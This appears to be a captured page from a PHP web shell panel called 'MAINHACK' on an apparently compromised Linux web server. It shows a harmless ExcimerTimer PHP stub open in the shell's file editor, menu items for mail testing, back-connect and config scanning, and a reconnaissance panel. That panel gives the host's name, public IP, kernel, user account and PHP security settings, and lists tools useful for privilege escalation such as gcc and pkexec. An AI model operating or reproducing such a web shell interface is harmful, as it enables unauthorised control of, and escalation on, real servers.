[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ExcimerTimer.stub
<?php namespace { /** * Generic timer class. Calls a callback after a specified time has elapsed, or * periodically with a given interval. */ class ExcimerTimer { /** * Set the type of time used by this object. May be either EXCIMER_REAL for * real (wall-clock) time, or EXCIMER_CPU for CPU time. If this function is * not called, EXCIMER_REAL will be used. * * @param int $eventType * @return void */ public function setEventType($eventType) { } /** * Switch to one-shot mode, and set the interval. This will take effect * when start() is next called. * * @param float $interval The interval in seconds * @return void */ public function setInterval($interval) { } /** * Switch to periodic mode, and set the period. This will take effect when * start() is next called. * * @param float $period The period in seconds. * @return void */ public function setPeriod($period) { } /** * Set the callback function, to be called next time either a one-shot * or periodic event occurs. * * The callback function shall take one parameter: an integer representing * the number of periods which have elapsed since the callback was last * called. This may be greater than 1 for two reasons: * * - The kernel or C library may fail to respond to the event in time, * and so may increment an overrun counter. * * - The native callback may be called multiple times before the PHP VM * has the chance to interrupt execution. For example, a long-running * native function such as a database connect will not be interrupted * when the timer is triggered. * * If the callback is set to null, or if this function has not been called, * no action is taken when the event occurs. * * @param callable|null $callback * @return void */ public function setCallback($callback) { } /** * Start the timer. * * If the timer is already running, it will be stopped and restarted, * respecting any changes to the interval, period or event type. * * @return void */ public function start() { } /** * Stop the timer. * * If the timer is not already running, this will have no effect. * * @return void */ public function stop() { } /** * Get the time until the next expiration, in seconds. If this is zero, * the timer is currently not running. * * @return float */ public function getTime() { } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002